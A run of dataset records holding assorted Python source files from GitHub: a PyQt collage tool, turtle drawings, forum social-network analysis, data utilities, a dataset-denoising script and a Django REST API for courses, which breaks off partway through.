dictionary with object name derived from dictionary key.\n \"\"\"\n self.cllimagemap[cllkey] = [this_groupBox]\n this_groupBox.setCheckable(True)\n this_groupBox.setChecked(True)\n this_groupBox.setObjectName(f\"{cllkey}_groupBox\")\n\n this_lineEdit = QtWidgets.QLineEdit()\n this_lineEdit.setFixedHeight(21)\n this_lineEdit.setFixedWidth(300)\n this_lineEdit.setObjectName(f\"{cllkey}_lineEdit\")\n \n this_label = QtWidgets.QLabel()\n this_label.setPixmap(self.empty_pixmap)\n this_label.setObjectName(f\"{cllkey}_label\")\n \n this_layout = QtWidgets.QVBoxLayout()\n this_layout.addWidget(this_lineEdit)\n this_layout.addWidget(this_label)\n this_groupBox.setLayout(this_layout)\n\n def mkcllpix(self):\n \"\"\" Set each QGroupBox to image tiled from source image. 
\"\"\"\n \n # first create as QImage objects saved in dictionary\n self.build_collages()\n \n # then set each QImage to QPixMap assigned to QGroupBox's QLabel object\n for i in range(4):\n cllkey = 'cll%d' % i\n if cllkey not in self.cllimagemap:\n print(\"should raise exception\")\n continue\n \n this_groupBox = self.cllimagemap[cllkey][0]\n \n parts = self.image_file.split('.')\n parts[0] = parts[0] + '_' + cllkey\n this_cll_file = '.'.join(parts)\n this_lineEdit_objectname = \"%s_lineEdit\" % cllkey\n this_lineEdit = this_groupBox.findChild(QtWidgets.QLineEdit, this_lineEdit_objectname)\n this_lineEdit.setText(this_cll_file)\n \n this_image = self.cllimagemap[cllkey][-1]\n this_pixmap = QtGui.QPixmap(this_image).scaledToWidth(300)\n \n this_label_objectname = \"%s_label\" % cllkey\n this_label = this_groupBox.findChild(QtWidgets.QLabel, this_label_objectname)\n\n if this_label is None:\n print(\"should raise exception\")\n continue\n\n this_label.setPixmap(this_pixmap)\n\n\n def build_collages(self):\n \"\"\" Draw tiled source image in all patterns and save each in dictionary. \"\"\"\n src_image = QtGui.QImage(self.srcfile)\n src_imageH = src_image.mirrored(True, False)\n src_imageV = src_image.mirrored(False, True)\n src_imageHV = src_image.mirrored(True, True)\n \n patterns = [[src_image, src_imageH, src_imageV, src_imageHV],\n [src_imageH, src_image, src_imageHV, src_imageV],\n [src_imageHV, src_imageV, src_imageH, src_image],\n [src_imageV, src_imageHV, src_image, src_imageH],\n ]\n \n src_width = src_image.width()\n src_height = src_image.height()\n target_width = src_width * 2\n target_height = src_height * 2\n \n src_images = []\n self.collages = []\n for i in range(4):\n src_images = patterns[i]\n target_image = QtGui.QImage(target_width, target_height, QtGui.QImage.Format_ARGB32_Premultiplied)\n painter = QtGui.QPainter(target_image)\n painter.drawImage(0, 0, src_images[0])\n painter.drawImage(src_width-1, 0, src_images[1])\n painter.drawImage(0, src_height-1, src_images[2])\n painter.drawImage(src_width-1, src_height-1, src_images[3])\n \n cllkey = 'cll%d' % i\n if cllkey in self.cllimagemap:\n self.cllimagemap[cllkey].append(target_image)\n logging.info(\"Adding collage %s to image map\" % cllkey)\n else:\n print(\"should raise exception\")\n continue\n \n painter.end()\n\n\n\n#########################################################\n# main\n#########################################################\n\nif __name__ == '__main__':\n\n app = QtWidgets.QApplication(sys.argv)\n cllwin = CollagerWin()\n sys.exit(app.exec_())\n\n\n","repo_name":"skoshiwosh/collager","sub_path":"collager.py","file_name":"collager.py","file_ext":"py","file_size_in_byte":11370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37839913467","text":"import turtle\nimport tkinter as tk\n\n# Draw the square\ndef draw_square():\n t = turtle.Turtle()\n t.penup()\n t.goto(-50, -50) # Starting point of the square\n t.pendown()\n t.pensize(2)\n for _ in range(4):\n t.forward(100) # Length of each side of the square\n t.left(90)\n t.hideturtle()\n\n# Draw the inscribed circle\ndef draw_circle():\n t = turtle.Turtle()\n t.penup()\n t.goto(0, -50) # Center point of the circle\n t.pendown()\n t.circle(50) # Radius of the circle\n t.hideturtle()\n\n# Create the Tkinter window\nwindow = tk.Tk()\n\n# Create the buttons\nstart_button = tk.Button(window, text=\"Start\")\nstop_button = tk.Button(window, text=\"Stop\")\npause_button = tk.Button(window, 
text=\"Pause\")\n\n# Set the layout using the grid system\nstart_button.grid(row=0, column=0)\nstop_button.grid(row=0, column=1)\npause_button.grid(row=0, column=2)\n\n# Adjust the spacing between buttons\nwindow.grid_columnconfigure(1, minsize=100) # Space between Start and Stop buttons\nwindow.grid_columnconfigure(2, minsize=100) # Space between Stop and Pause buttons\n\n# Call the functions to draw the square and inscribed circle\ndraw_square()\ndraw_circle()\n\n# Run the Tkinter event loop\nwindow.mainloop()\n\n# Close the turtle graphics window\nturtle.done()\n","repo_name":"Kunalpawar3224/hellogit","sub_path":"ncircle/ncircle_geometry/eleventh_assi.py","file_name":"eleventh_assi.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33902490454","text":"s=input()\r\nc=input()\r\nl3=[]\r\nl1=list(s.strip(\" \"))\r\nl2=list(c.strip(\" \"))\r\nfor i in l1:\r\n j=i.lower()\r\n while((i in l2) or (j in l2)):\r\n if(i.isdigit()):\r\n l3.append(i)\r\n else:\r\n if(i in l2):\r\n print(i,end=\"\")\r\n elif(j in l2):\r\n print(j,end=\"\")\r\n if(i in l2):\r\n l2.remove(i)\r\n else:\r\n l2.remove(j)\r\nfor i in l3:\r\n print(i,end=\"\")","repo_name":"prateekgupta2024/Practice-Questions","sub_path":"problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1679776858","text":"# -*- coding: utf-8 -*-\nfrom pandas import DataFrame,Series\nimport pandas.io.sql as psql\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json, io,db\nimport networkx as nx\nfrom networkx.readwrite import json_graph\nfrom datetime import *\nimport community\n#############################################################################################################\ndef social_network():\n foros=db.mySQLConect(\"localhost\",\"root\",\"lego\",\"rita\")\n msg= psql.frame_query('select * from message;', foros.db)\n edges=[]\n\n for idx,m in msg[msg.referedTo.notnull()].iterrows():\n if(m['date']<datetime.strptime('08/01/11', \"%m/%d/%y\").date()): \n course='2010-2011'\n elif(m['date']<datetime.strptime('08/01/12', \"%m/%d/%y\").date()): \n course='2011-2012'\n sender=long(m['sender'])\n receiver=long(msg[msg.idMessage==m['referedTo']]['sender'])\n edges.append((sender,receiver))\n else:\n course='2012-2013'\n graph=nx.DiGraph()\n for (x,y) in edges:\n if graph.edges().count((x,y))==0:\n graph.add_edge(x,y,weight= edges.count((x,y)))\n \n partition = community.best_partition(nx.Graph(graph))\n for n in partition.keys():\n graph.node[n][\"group\"]=partition[n]\n return graph \n#############################################################################################################\ndef gen_network_json(graph):\n\n data=dict(nodes=graph.nodes(data=True), edges=graph.edges(data=True))\n #data=json_graph.node_link_data(graph)\n with io.open('C:/Users/Llanos/Documents/GitHub/AutoESDashboard/html/data/network.json', 'w', encoding='utf-8') as f:\n f.write(unicode(json.dumps(data, ensure_ascii=False)))\n \n#############################################################################################################\ndef social_parameters():\n g=social_network()\n\n\n degree=DataFrame(nx.degree_centrality(g).values(),index=g.nodes(),columns=['degree'])\n #closeness=DataFrame(nx.closeness_centrality(g,normalized=True).values(),index=g.nodes(),columns=['closeness'])\n 
between=DataFrame(nx.betweenness_centrality(g,normalized=True).values(),index=g.nodes(),columns=['between'])\n eigen=DataFrame(nx.eigenvector_centrality(g).values(),index=g.nodes(),columns=['eigen'])\n clustering=DataFrame(nx.clustering(nx.Graph(g)).values(),index=g.nodes(),columns=['clustering'])\n\n #data=pd.merge(degree,pd.merge(between,pd.merge(eigen,clustering)))\n data=degree.join(between.join(eigen.join(clustering)))\n return data\n############################################################################################################\ncomputed_social=social_parameters()\n","repo_name":"LlanosTobarra/AutoESDashboard","sub_path":"sna.py","file_name":"sna.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19626953733","text":"import pandas as pd\nimport numpy as np\nimport os as os\nimport requests as rq\nimport pickle as pkl\nimport gensim as gs\nimport sys as sy\nimport sqlalchemy as sq\n\ndef read_db(database_filename, table_name):\n \"\"\"\n Read a db file and return it as a dataframe\n :param database_filename: The DB file path\n :param table_name: The table name\n :return: The dataframe\n \"\"\"\n\n engine = sq.create_engine('sqlite:///' + database_filename)\n return pd.read_sql(table_name, con=engine)\n\ndef to_db(df, database_filename, table_name, index = False):\n \"\"\"\n Save a data frame as a SQLite DB file to the given location with the given table name\n :param df: The data frame to save\n :param database_filename: The DB file to create (NOTE: Will be replaced if it exists)\n :param index: (Optional, Default: False) Whether or not to create an index column in the saved table\n :param table_name: The name of the table to contain the data frame data\n \"\"\"\n\n # If the DB file exists, delete it\n if os.path.exists(database_filename):\n os.remove(database_filename)\n\n # Save data to an sqlite db\n engine = sq.create_engine('sqlite:///' + database_filename)\n df.to_sql(table_name, engine, index=index)\n\ndef widen_df_display():\n \"\"\"\n Widens the way dataframes are printed (setting lifetime is runtime)\n \"\"\"\n\n pd.set_option('display.width', 3000)\n pd.set_option('display.max_columns', 100)\n\ndef try_word2vec(word):\n \"\"\"\n Gets the word vector for the given work based on Google's trained model.\n 1. Tries the cache first\n 2. Loads the model between 0 and 1 times per run (Will download it automatically if necessary)\n 3. Updates cache\n :param word: The word to vectorize\n :return: The (word vector, boolean for success/failure)\n \"\"\"\n\n global google_word2vec_model\n global word2vec_cache\n model_filename = __file__[0:__file__.rindex('\\\\')] + '\\\\..\\\\models\\\\nl\\\\GoogleWord2VecModel.bin'\n cache_filename = __file__[0:__file__.rindex('\\\\')] + '\\\\..\\\\models\\\\nl\\\\word2vec_cache.pkl'\n\n # Check cache\n if word2vec_cache is None:\n if os.path.exists(cache_filename):\n word2vec_cache = read_pkl(cache_filename)\n else:\n word2vec_cache = {}\n to_pkl(word2vec_cache, cache_filename)\n\n # Try cache\n if word in word2vec_cache:\n return word2vec_cache[word], word2vec_cache[word] is not None\n # Use Google's model\n else:\n if google_word2vec_model is None:\n print('Need to load Google word2vec Model')\n\n # Check if model exists, download otherwise\n if not os.path.exists(model_filename):\n print('Google word2vec model not found. 
Will download (~3.5GB)...')\n download_gdrive_file('1kzCpXqZ_EILFAfK4G96QZBrjtezxjMiO', model_filename) # Hard-coded file id\n print('Done downloading Google word2vec model')\n\n print('Loading Google word2vec model...')\n google_word2vec_model = gs.models.KeyedVectors.load_word2vec_format(model_filename, binary=True)\n print('Done loading Google word2vec model')\n\n try:\n word2vec_cache[word] = google_word2vec_model[word]\n to_pkl(word2vec_cache, cache_filename)\n return word2vec_cache[word], True\n except:\n word2vec_cache[word] = None\n to_pkl(word2vec_cache, cache_filename)\n return word2vec_cache[word], False\n\ndef read_pkl(file_name):\n \"\"\"\n De-serializes a pickle file into an object and returns it\n :param file_name: The name of the pickle file\n :return: The object that is de-serialized\n \"\"\"\n\n with open(file_name, 'rb') as file:\n return pkl.load(file)\n\ndef to_pkl(obj, file_name):\n \"\"\"\n Save the given object as a pickle file to the given file name\n :param obj: The object to serialize\n :param file_name: The file name to save it to\n :return: returns the same object back\n \"\"\"\n\n with open(file_name, 'wb') as file:\n pkl.dump(obj, file)\n\ndef one_hot_encode(df, column_name, prefix = '', replace_column = True, insert_to_end = False):\n \"\"\"\n Performs one hot encoding on the given column in the data and replaces this column with the\n new one hot encoded columns\n :param df: The data frame in question\n :param column_name: The column to one hot encode\n :param prefix: (Optional, Default: column_name) The prefix for the new columns\n :param replace_column: (Optional, Default: True) Whether or not to replace the column to encode\n :param insert_to_end: (Optional, Default: False) Whether or not to add encoded columns at the end\n :return: The same data frame with the specified changes\n \"\"\"\n\n dummies_insertion_index = df.columns.get_loc(column_name)\n dummies = pd.get_dummies(df[column_name], prefix=column_name if prefix == '' else prefix)\n\n if replace_column:\n df = df.drop([column_name], axis=1)\n else:\n dummies_insertion_index += 1\n\n if insert_to_end:\n df = pd.concat([df, dummies], axis=1)\n else:\n for column_to_insert in dummies.columns:\n df.insert(loc=dummies_insertion_index, column=column_to_insert, value=dummies[column_to_insert])\n dummies_insertion_index += 1\n\n return df\n\ndef read_csv(file_path, verbose=True):\n \"\"\"\n Reads a csv file and returns the smallest possible dataframe\n :param file_path: The file path\n :param verbose: Whether or not to be verbose about the memory savings\n :return: An optimized dataframe\n \"\"\"\n\n ret_val = pd.read_csv(file_path)\n return reduce_mem_usage(ret_val, verbose)\n\ndef download_gdrive_file(file_id, output_file_path):\n \"\"\"\n Download a file from Google Drive given its file id\n (Source: https://github.com/nsadawi/Download-Large-File-From-Google-Drive-Using-Python)\n :param file_id: The file id\n :param output_file_path: The path of the output file\n \"\"\"\n\n URL = \"https://docs.google.com/uc?export=download\"\n\n session = rq.Session()\n\n response = session.get(URL, params = { 'id' : file_id }, stream = True)\n token = __get_confirm_token__(response)\n\n if token:\n params = { 'id' : file_id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n\n __save_response_content__(response, output_file_path)\n\ndef whats(thing) :\n \"\"\"\n Prints the type of object passed in\n Parameters:\n thing (Object): The object for which the type needs to be printed\n 
\"\"\"\n\n print(type(thing))\n\ndef reduce_mem_usage(df, verbose=True):\n \"\"\"\n Takes a dataframe and returns one that takes the least memory possible.\n This works by going over each column and representing it with the smallest possible data structure.\n Example usage: my_data = pd.read_csv('D:/SomeFile.csv').pipe(reduce_mem_usage)\n Source: (https://www.kaggle.com/arjanso/reducing-dataframe-memory-size-by-65)\n Parameters:\n df (DataFrame): The dataframe to optimize\n verbose (bool): Whether or not to be verbose about the savings\n \"\"\"\n\n numerics = [\"int16\", \"int32\", \"int64\", \"float16\", \"float32\", \"float64\"]\n start_mem = df.memory_usage().sum() / 1024 ** 2\n for col in df.columns:\n col_type = df[col].dtypes\n if col_type in numerics:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == \"int\":\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if (\n c_min > np.finfo(np.float16).min\n and c_max < np.finfo(np.float16).max\n ):\n df[col] = df[col].astype(np.float16)\n elif (\n c_min > np.finfo(np.float32).min\n and c_max < np.finfo(np.float32).max\n ):\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n end_mem = df.memory_usage().sum() / 1024 ** 2\n if verbose:\n print(\n \"Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)\".format(\n end_mem, 100 * (start_mem - end_mem) / start_mem\n )\n )\n return df\n\n#region Properties\n\ngoogle_word2vec_model = None\n\nword2vec_cache = None\n\n#endregion\n\n#region Private\n\ndef __get_confirm_token__(response):\n \"\"\"\n Get a confirmation token from Google Drive (that says I'm ok with not scanning for viruses)\n :param response: The HTTP response object\n :return: The token\n \"\"\"\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef __save_response_content__(response, output_file_name):\n \"\"\"\n Given an HTTP response object and a output file name, save the content to the file\n :param response: The HTTP response object\n :param output_file_name: The path of the output file\n \"\"\"\n\n CHUNK_SIZE = 32768\n file_size = int(response.headers.get('Content-Length')) if response.headers.get('Content-Length') else None\n\n with open(output_file_name, \"wb\") as f:\n i = 1\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk:\n mb_sofar = CHUNK_SIZE * i / 1024 / 1024\n if file_size:\n percentage = (CHUNK_SIZE * i / file_size * 100)\n sy.stdout.write('\\r' + '[ ]'\n .replace(' ', ':', int(percentage / 2)) + ' ' + str(\n min(int(percentage), 100)) + '% (' + str(round(mb_sofar, 2)) + 'MB)')\n else:\n sy.stdout.write('\\r' + 'Unknown file size. ' + str(round(mb_sofar, 2)) + 'MB downloaded')\n f.write(chunk)\n i += 1\n print('')\n\n#endregion","repo_name":"Ravi5ingh/converse-api","sub_path":"utility/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":10403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21587221229","text":"# -*- coding: utf-8 -*-\n# Author: Xiaoming Qin\n\n\"\"\" Create denoised dataset by clustering. 
\"\"\"\n\nfrom os.path import join as pjoin\nimport os\nimport random\n\n\ndef denoised_main(cls_id):\n    probs_root = \"../data/pred_probs\"\n    cluster_root = \"../data/k-means\"\n    noisy_root = \"../data/noisy\"\n    save_root = \"../data/denoised\"\n    lbl_map_file = \"../data/labels_queries_map.txt\"\n\n    with open(lbl_map_file, 'r') as f:\n        lines = f.readlines()\n\n    lbl_map = {}\n    for l in lines:\n        idx, name = l.split(' ')[0:2]\n        lbl_map[str(idx)] = name\n\n    # For data cleaner noisy data\n    with open(pjoin(noisy_root, lbl_map[cls_id] + '.txt'), 'r') as f:\n        lines = f.readlines()\n\n    noisy_list = set([l.strip('\\n') + \".jpg\" for l in lines])\n\n    name_list = []\n\n    with open(pjoin(probs_root, cls_id + '.lst'), 'r') as f:\n        lines = f.readlines()\n\n    name_list = [l.split(' ')[0] for l in lines]\n    probs_list = [float(l.split(' ')[1]) for l in lines]\n\n    with open(pjoin(cluster_root, cls_id + '.lst'), 'r') as f:\n        lines = f.readlines()\n\n    cluster_list = [int(l.split(' ')[1]) for l in lines]\n\n    clean_labels = set([1, 2])\n\n    new_arr = []\n\n    counter_clean = 0\n    counter_noisy = 0\n\n    for i in range(len(name_list)):\n        if cluster_list[i] in clean_labels \\\n                and probs_list[i] >= 0.5:\n            # and (name_list[i] not in noisy_list):\n            new_arr.append((name_list[i], 1))\n            counter_clean += 1\n        else:\n            new_arr.append((name_list[i], 0))\n            counter_noisy += 1\n\n    print(len(name_list))\n    print(counter_clean)\n    print(counter_noisy)\n\n    # open in text mode: formatted strings are written, not bytes\n    with open(pjoin(save_root, cls_id + '.lst'), 'w') as f:\n        for i in range(len(new_arr)):\n            f.write(\"{} {} {}\\n\".format(\n                new_arr[i][0], new_arr[i][1], new_arr[i][1]))\n\n\ndef over_sampling(data_list, target_num):\n    random.seed(0)\n    dst_list = []\n    for i in range(target_num - len(data_list)):\n        dst_list.append(random.choice(data_list))\n\n    return dst_list\n\n\ndef create_final_dataset():\n    src_train_f = \"../data/train_q10.lst\"\n    dst_train_f = \"../data/train_q10_denos.lst\"\n\n    denos_root = \"../data/denoised\"\n\n    arr = [[] for _ in range(40)]\n\n    with open(src_train_f, 'r') as f:\n        lines = f.readlines()\n\n    for l in lines:\n        idx, name = l.strip('\\n').split(' ')\n        arr[int(idx)].append(name)\n\n    over_sam_fld = \"../data/over_samp\"\n\n    for fname in os.listdir(denos_root):\n        cls_id = int(fname.split('.')[0])\n\n        with open(pjoin(denos_root, fname), 'r') as f:\n            lines = f.readlines()\n\n        repl = []\n\n        for l in lines:\n            name, label = l.strip('\\n').split(' ')[0:2]\n            name = name[:-4]\n            label = int(label)\n            if label == 1:\n                repl.append(name)\n\n        print(\"{}: old {}\".format(cls_id, len(arr[cls_id])))\n\n        over_repl = over_sampling(repl, len(arr[cls_id]))\n\n        print(len(over_repl))\n\n        with open(pjoin(over_sam_fld, fname), 'w') as f:\n            for i in range(len(over_repl)):\n                f.write(\"{}.jpg\\n\".format(over_repl[i]))\n\n        arr[cls_id] = repl\n\n        print(\"{}: new {}\".format(cls_id, len(arr[cls_id])))\n\n    # for i in range(40):\n    #     print(\"{}: {}\".format(i, len(arr[i])))\n\n    with open(dst_train_f, 'w') as f:\n        for i in range(40):\n            for j in range(len(arr[i])):\n                f.write(\"{} {}\\n\".format(i, arr[i][j]))\n\n\nif __name__ == \"__main__\":\n    cls_id = 26\n    # denoised_main(str(cls_id))\n    create_final_dataset()\n","repo_name":"xiaoming-qxm/webvision","sub_path":"tools/crt_denoised_dset.py","file_name":"crt_denoised_dset.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"34599410436","text":"from django.http import HttpResponse, JsonResponse\r\nfrom django.db.models import Q\r\nfrom 
django.views.generic import UpdateView\r\nfrom rest_framework import permissions\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom rest_framework.parsers import JSONParser\r\nfrom users.models import User\r\nfrom .models import Message, Course, Opinions, File, Annoucement, Grade, Task, Classes, UserClasses, UserCourse, User_Tasks_Files\r\nfrom .serializers import MessageSerializer, CourseSerializer, OpinionsSerializer, FileSerializer, AnnoucementSerializer,\\\r\n GradeSerializer, TaskSerializer, ClassesSerializer, UserCourseSerializer, UserTasksFilesSerializer, \\\r\n StudentPresenceSerializer\r\nfrom rest_framework import status\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.parsers import MultiPartParser, FormParser\r\nfrom rest_framework.renderers import BaseRenderer\r\nfrom wsgiref.util import FileWrapper\r\n\r\n# Create your views here.\r\n\r\n\r\nclass AnnoucementAPIView(APIView):\r\n def get(self, request, id=None, id_course=None):\r\n serializer = AnnoucementSerializer()\r\n if id:\r\n articles = Annoucement.objects.get(id=id)\r\n serializer = AnnoucementSerializer(articles)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_course:\r\n articles = Annoucement.objects.filter(id_course=id_course)\r\n serializer = AnnoucementSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n else:\r\n articles = Annoucement.objects.all()\r\n serializer = AnnoucementSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass AnnoucementCreate(APIView):\r\n def post(self, request):\r\n serializer = AnnoucementSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass MessageAPIView(APIView):\r\n def get(self, request):\r\n messages = Message.objects.filter(Q(id_sender=request.user.id) | Q(id_receiver=request.user.id))\r\n serializer = MessageSerializer(messages, many=True)\r\n return Response(serializer.data)\r\n\r\n\r\nclass MessageCreate(APIView):\r\n\r\n def post(self, request):\r\n serializer = MessageSerializer(data=request.data)\r\n # if Token.objects.filter(user = request.data['id_sender']).exist():\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass CourseAPIView(APIView):\r\n def get(self, request, id=None):\r\n serializer = CourseSerializer()\r\n if id:\r\n articles = Course.objects.get(id=id)\r\n serializer = CourseSerializer(articles)\r\n else:\r\n articles = Course.objects.all()\r\n serializer = CourseSerializer(articles, many=True)\r\n return Response(serializer.data)\r\n\r\nclass CourseCreate(APIView):\r\n def post(self, request, format='json'):\r\n serializer = CourseSerializer(data=request.data)\r\n if serializer.is_valid():\r\n course = serializer.save()\r\n if course:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass CourseDetails(APIView):\r\n def get_object(self, id):\r\n 
try:\r\n            return Course.objects.get(id=id)\r\n        except Course.DoesNotExist:\r\n            return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n    def get(self, request, id):\r\n        article = self.get_object(id)\r\n        serializer = CourseSerializer(article)\r\n        return Response(serializer.data)\r\n\r\n    def put(self, request, id):\r\n        article = self.get_object(id)\r\n        serializer = CourseSerializer(article, data=request.data)\r\n        if serializer.is_valid():\r\n            serializer.save()\r\n            return Response(serializer.data)\r\n        return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n    def delete(self, request, id):\r\n        article = self.get_object(id)\r\n        article.delete()\r\n        return HttpResponse(status=status.HTTP_204_NO_CONTENT)\r\n\r\nclass OpinionsDetails(APIView):\r\n    def get_object(self, id):\r\n        try:\r\n            return Opinions.objects.get(id_receiver=id)\r\n        except Opinions.DoesNotExist:\r\n            return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n    def put(self, request, id):\r\n        article = self.get_object(id)\r\n        serializer = OpinionsSerializer(article, data=request.data)\r\n        if serializer.is_valid():\r\n            serializer.save()\r\n            return Response(serializer.data)\r\n        return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n    def get(self, request, id):\r\n        article = self.get_object(id)\r\n        serializer = OpinionsSerializer(article)\r\n        return Response(serializer.data)\r\n\r\n    def delete(self, request, id):\r\n        article = self.get_object(id)\r\n        article.delete()\r\n        return HttpResponse(status=status.HTTP_204_NO_CONTENT)\r\n\r\nclass OpinionsAPIView(APIView):\r\n    def get(self, request, id=None):\r\n        serializer = OpinionsSerializer()\r\n        if id:\r\n            articles = Opinions.objects.get(id=id)\r\n            serializer = OpinionsSerializer(articles)\r\n        else:\r\n            articles = Opinions.objects.all()\r\n            serializer = OpinionsSerializer(articles, many=True)\r\n        return Response(serializer.data)\r\n\r\nclass OpinionCreate(APIView):\r\n    def post(self, request, format='json'):\r\n        serializer = OpinionsSerializer(data=request.data)\r\n        if serializer.is_valid():\r\n            opinions = serializer.save()\r\n            if opinions:\r\n                json = serializer.data\r\n                return Response(json, status=status.HTTP_201_CREATED)\r\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass FileAPIView(APIView):\r\n    # permission_classes = (permissions.AllowAny,) ### uncomment this if you want access without a token\r\n\r\n    def get(self, request, id=None, format=None):\r\n        articles = File.objects.all()\r\n        serializer = FileSerializer(articles, many=True)\r\n        return Response(serializer.data)\r\n\r\nclass FileDownload(APIView):\r\n    class BinaryFileRenderer(BaseRenderer):\r\n        media_type = 'application/octet-stream'\r\n        format = None\r\n        charset = None\r\n        render_style = 'binary'\r\n\r\n        def render(self, data, media_type=None, renderer_context=None):\r\n            return data\r\n\r\n    renderer_classes = (BinaryFileRenderer,)\r\n    # permission_classes = (permissions.AllowAny,) ### uncomment this if you want access without a token\r\n\r\n    def get(self, request, id=None, format=None):\r\n        obj = File.objects.get(id=id)\r\n        field_object = File._meta.get_field('file')\r\n        path = str(field_object.value_from_object(obj))\r\n        file_name = path[path.index('files/')+6:]\r\n\r\n        with open(path, 'rb') as report:\r\n            return Response(\r\n                report.read(),\r\n                headers={\r\n                    'Content-Disposition': 'attachment; filename='+file_name,\r\n                    \"Access-Control-Expose-Headers\": 'Content-Disposition'\r\n                },\r\n                
content_type='application/octet-stream')\r\n\r\n\r\n\r\nclass FileCreate(APIView):\r\n    permission_classes = (permissions.AllowAny,) ### uncomment this if you want access without a token\r\n    queryset = File.objects.all()\r\n    parser_classes = (FormParser, MultiPartParser)\r\n    serializer_class = FileSerializer\r\n\r\n    def post(self, request, filename=None, format=None):\r\n        serializer = FileSerializer(data=request.data)\r\n        if serializer.is_valid():\r\n            serializer.save()\r\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n        return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass GradeAPIView(APIView):\r\n\r\n    def get(self, request, id=None, id_student=None, id_task=None, id_course=None):\r\n        if id:\r\n            articles = Grade.objects.get(id=id)\r\n            serializer = GradeSerializer(articles)\r\n            json = serializer.data\r\n            return Response(json, status=status.HTTP_201_CREATED)\r\n        elif id_student and id_task:\r\n            articles = Grade.objects.filter(id_student=id_student, id_task=id_task)\r\n            serializer = GradeSerializer(articles, many=True)\r\n            json = serializer.data\r\n            return Response(json, status=status.HTTP_201_CREATED)\r\n        elif id_student and id_course:\r\n            articles = Grade.objects.filter(id_student=id_student, id_course=id_course)\r\n            serializer = GradeSerializer(articles, many=True)\r\n            json = serializer.data\r\n            return Response(json, status=status.HTTP_201_CREATED)\r\n        elif id_student:\r\n            articles = Grade.objects.filter(id_student=id_student)\r\n            serializer = GradeSerializer(articles, many=True)\r\n            json = serializer.data\r\n            return Response(json, status=status.HTTP_201_CREATED)\r\n        elif id_task:\r\n            articles = Grade.objects.filter(id_task=id_task)\r\n            serializer = GradeSerializer(articles, many=True)\r\n            json = serializer.data\r\n            return Response(json, status=status.HTTP_201_CREATED)\r\n        else:\r\n            articles = Grade.objects.all()\r\n            serializer = GradeSerializer(articles, many=True)\r\n            json = serializer.data\r\n            return Response(json, status=status.HTTP_201_CREATED)\r\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass GradeCreate(APIView):\r\n\r\n    def post(self, request, format='json'):\r\n        serializer = GradeSerializer(data=request.data)\r\n        if serializer.is_valid():\r\n            grade = serializer.save()\r\n            if grade:\r\n                json = serializer.data\r\n                return Response(json, status=status.HTTP_201_CREATED)\r\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass TaskAPIView(APIView):\r\n\r\n    def get(self, request, id=None):\r\n        serializer = TaskSerializer()\r\n        if id:\r\n            articles = Task.objects.get(id=id)\r\n            serializer = TaskSerializer(articles)\r\n        else:\r\n            articles = Task.objects.all()\r\n            serializer = TaskSerializer(articles, many=True)\r\n        return Response(serializer.data)\r\n\r\nclass TaskCreate(APIView):\r\n\r\n    def post(self, request, format='json'):\r\n        serializer = TaskSerializer(data=request.data)\r\n   